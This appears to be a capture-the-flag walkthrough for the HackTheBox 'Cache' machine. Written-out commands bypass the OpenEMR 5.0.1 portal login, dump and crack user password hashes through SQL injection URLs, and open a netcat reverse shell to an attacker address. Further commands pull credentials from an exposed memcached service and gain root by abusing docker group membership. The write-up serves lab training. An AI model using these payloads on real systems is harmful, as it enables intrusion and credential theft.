Last updated on July 4, 2021
Level : Intermediate
Task : To root the machine and collect user and root flag.
- openemr vulnerability
- SQL injection and RCE
- Privilege Escalation
we start our scanning with rustscan and it give result that port 22 for SSH and port 80 for HTTP are opened.
rustscan --ulimit 5001 -a 10.129.2.219 -- -sC -sV
So now we know that port 80 have some webpage with title Cache where we find some link like Home, News, Contact us, authors, login and as I see login page it caught my eyes and we start digging for the login page.
using these credentials we login to page but nothing interested and we also try to do SSH but failed so we start more digging and on authors page we find something strange i.e authors are working on some other project also so we add it to our hosts file and then visit to it .
now we visit hms.htb we see that openemr is there with 2018 copyright and after searching to the internet we get that in 2018 we have openemr 5.0.1 which have some serious vulnerability you can read from here.
After reading the vulnerability report we first have to bypass the login page and we can do it with patient portal . Here we go to the register panel and with the help of Burp Suite we can modify the request and change the destination page.
Now we can see that we make a register request as a new user .
Make the change in the URL request on which we want to go directly.
we are successfully bypass the authentication of the portal.
Now it’s time to go for the second vulnerability i.e SQL injection. Now according to the vulnerability report, we can fuzz for the SQL vulnerability at add_edit_event_user page
SQL injection in add_edit_event_user.php is caused by unsanitized user input from the eid,userid, and pid parameters. Exploiting this vulnerability requires authentication to PatientPortal; however, it can be exploited without authentication when combined with the PatientPortal authentication bypass
After finding the SQL vulnerability, it’s time for further action so that we can get some useful information or any kind of password, or something else.
So first we have to find out the number of columns and we find that we have four columns after getting number of columns now its time to find out the leak parameter
http://hms.htb/portal/add_edit_event_user.php?eid=1 order by 4
Now let check the version first
let check out the database and we found the name of database “openemr”
Now we know the database let go for the table from openemr database , here we apply some filter because there are too many tables which are enable to show on error page and after applying the filter we get some tables like users , users_secure ,etc .
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(table_name),null from information_schema.tables where table_schema='openemr' and table_name like 'user%'
After getting the tables its time to find out the columns .At this place we try to dump out the columns from every table but required data we get from table users_secure .
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(column_name),null from information_schema.columns where table_name='users_secure'
Columns we get from the table are Id, username, password, salt, last_update, etc and in the list two are my favorite username and password.
Now first dump out the usernames
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(username),null from users_secure
Now we know the username let dump out the password
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(Password),null from users_secure
Now we have some hash , but we have to first identify the kind of hash for which i going to use hashcat and we find that this is bcrypt type hash , let crack it
sudo hashcat -m 3200 hash Desktop/HTB/rockyou.txt
We successfully crack the hash let make ssh using these credentials but failed , so we start dig more and we find some exploit here which require authentication and we have some credentials so let give try to it .
searchsploit openemr 5.0.1 searchsploit -m 45161
After understanding the exploit we run it , make sure change the username and password
python 45161.py http://hms.htb -u xxxxxxx -p xxxxxx -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.68 1234 >/tmp/f'
Now we have the shell and in starting we get some credentials of ash we use it and it work we have our first flag .
now it’s time for getting the root power, let checkout any service running on local we get some wired thing, here is something that is running on port 11211 and is generally used by the Memcached server. Due to misconfiguration, we are able to connect to the server using telnet , we can also dump out the memory data.
telnet 127.0.0.1 11211 version stats cachedump 1 0 get user get passwd
Now we have username and password by which we can ssh the server and here we get very interesting thing that this user is the member of docker group and this is very serious issue but jackpot to a hacker .
Let get the root level access by exploiting the docker service . Now here first we create the container of Ubuntu and mount the host file system to the container and then get the interactive access of the container we can put the bash compiled file with SUID bit set and execution permission also set in container . You can read more about docker exploitation from here .
docker images docker pull ubuntu docker images docker run -it -v /:/mnt ubuntu cd /mnt which bash cp /bin/bash /mnt/home/luffy/ cd /mnt/home/luffy/ chmod +xs bash
Once everything set we go back to host machine and there have our bash file on which SUID bit is set and we can run it and finally we have root power on target server .